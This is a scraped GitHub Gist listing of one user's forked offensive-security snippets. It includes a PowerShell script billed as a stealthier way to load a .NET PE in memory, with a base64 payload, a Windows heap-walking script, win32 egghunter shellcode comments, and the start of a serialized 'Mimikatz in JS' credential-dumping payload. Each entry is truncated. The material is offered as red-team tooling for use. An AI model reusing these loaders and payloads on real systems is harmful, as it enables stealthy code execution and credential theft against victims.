Topher Timzen tophertimzen
tophertimzen
/ LoadInMemoryModule.ps1
Created
March 30, 2018 23:55
— forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
tophertimzen
/ HeapWalker.py
Created
November 16, 2017 04:57
— forked from debasishm89/HeapWalker.py
HeapWalker - Walking Windows 7 process heaps using pydbg
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| HeapWalker - Walking Windows 7 process heaps using pydbg | |
| Author : Debasish Mandal | |
| Blog :http://www.debasish.in/ | |
| Twitter : https://twitter.com/debasishm89 | |
| Description : This python script is simplest implementation of Windows HeapWalk() API. | |
| It uses pydbg and allows user to Walk Through debugee process's heaps on the fly. |
tophertimzen
/ omelette_egghunter_win
Created
November 3, 2017 16:55
— forked from luca-m/omelette_egghunter_win
egghunt shellcode for win32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Optimized egghunt shellcode for win32 (32 bytes) | |
| * | |
| * Credits: http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c | |
| * | |
| * Description | |
| * | |
| * This code works by abusing an NT syscall (NtAccessCheckAndAuditAlaram) | |
| * whereby it uses the kernel to validate whether or not a set of addresses | |
| * is valid, and, if it is, whether or not they match the 8 byte egg we're |
tophertimzen
/ katz.js
Created
October 30, 2017 21:03
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialized_obj = [ | |
| 0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
| 101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
| 101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
| 68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
| 103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
| 122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
| 101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
| 0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |